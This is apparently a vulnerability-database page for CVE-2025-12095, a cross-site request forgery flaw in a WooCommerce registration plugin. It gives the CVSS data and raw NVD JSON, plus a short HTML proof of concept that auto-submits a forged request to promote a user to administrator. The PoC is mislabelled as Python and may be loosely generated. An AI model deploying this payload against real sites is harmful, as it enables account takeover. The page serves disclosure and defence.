Security Vulnerability Report
中文
CVE-2025-12095 CVSS 8.8 HIGH

CVE-2025-12095

Published: 2025-10-25 06:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Simple Registration for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.8. This is due to missing nonce validation on the role requests admin page handler in the includes/display-role-admin.php file. This makes it possible for unauthenticated attackers to approve pending role requests and escalate user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Simple Registration for WooCommerce ≤ 1.5.8(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-12095 --> <!-- Purpose: Trick admin to approve pending role requests --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <form action="http://target-site.com/wp-admin/admin-post.php" method="POST" id="exploit"> <input type="hidden" name="action" value="srw_approve_role"> <input type="hidden" name="role_request_id" value="1"> <input type="hidden" name="user_id" value="ATTACKER_USER_ID"> <input type="hidden" name="new_role" value="administrator"> <!-- Security researcher note: Add nonce if required by target version --> </form> <script> document.getElementById('exploit').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12095", "sourceIdentifier": "[email protected]", "published": "2025-10-25T06:15:36.097", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple Registration for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.8. This is due to missing nonce validation on the role requests admin page handler in the includes/display-role-admin.php file. This makes it possible for unauthenticated attackers to approve pending role requests and escalate user privileges via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-simple-registration/tags/1.5.8/includes/display-role-admin.php#L132", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3383124", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9c32fcaf-afc3-4493-8cd8-6f49bbe40c7b?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.